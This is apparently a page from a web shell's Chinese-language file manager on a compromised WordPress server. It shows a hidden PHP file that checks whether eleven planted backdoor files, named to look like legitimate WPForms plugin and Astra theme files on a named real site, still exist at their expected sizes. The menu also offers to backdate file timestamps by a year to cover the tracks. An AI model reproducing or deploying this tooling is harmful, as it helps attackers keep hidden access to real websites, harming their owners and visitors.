文件操作 - .object
返回文件管理
返回主菜单
删除本文件
文件: /var/tmp/.object
编辑文件内容
<?php $r = '/var/www/ficgenero.uaysen.cl/html'; $x = ["/wp-content/plugins/wpforms-lite/vendor_prefixed/tijsverkoyen/css-to-inline-styles/src/Css/Property/sadtab_forgetpw.php"=>"bd@@1270611@@909", "/wp-content/themes/astra/inc/builder/type/base/dynamic-css/html/class.astra.html.component.dynamic.css.php"=>"bd@@1270666@@1008", "/wp-content/plugins/wpforms-lite/vendor_prefixed/stripe/stripe-php/lib/Service/Issuing/help_fields_edit.php"=>"bd@@1278106@@920", "/wp-content/plugins/wpforms-lite/vendor_prefixed/stripe/stripe-php/lib/Service/Reporting/et_EE.php"=>"bd@@1278120@@898", "/wp-content/themes/astra/inc/builder/type/base/dynamic-css/social/class.astra.social.component.dynamic.css.php"=>"bd@@1270707@@973", "/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv/Resources/charset/from.windows.php"=>"bd@@1278136@@909", "/wp-content/themes/astra/inc/builder/type/header/above-header/class.astra.above.header.loader.php"=>"bd@@1278154@@1030", "/wp-content/themes/astra/inc/builder/type/header/edd-cart/dynamic-css/authentication.php"=>"bd@@1270734@@960", "/wp-content/themes/astra/inc/builder/type/header/html/dynamic-css/storage.php"=>"bd@@1270753@@870", "/wp-content/themes/astra/inc/compatibility/edd/customizer/sections/class.astra.edd.sidebar.configs.php"=>"bd@@1278178@@1024", "/wp-content/themes/astra/inc/builder/type/footer/below-footer/class.astra.below.footer.component.loader.php"=>"bd@@1268458@@951"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');
修改文件时间
将文件时间修改为当前时间的前一年
删除文件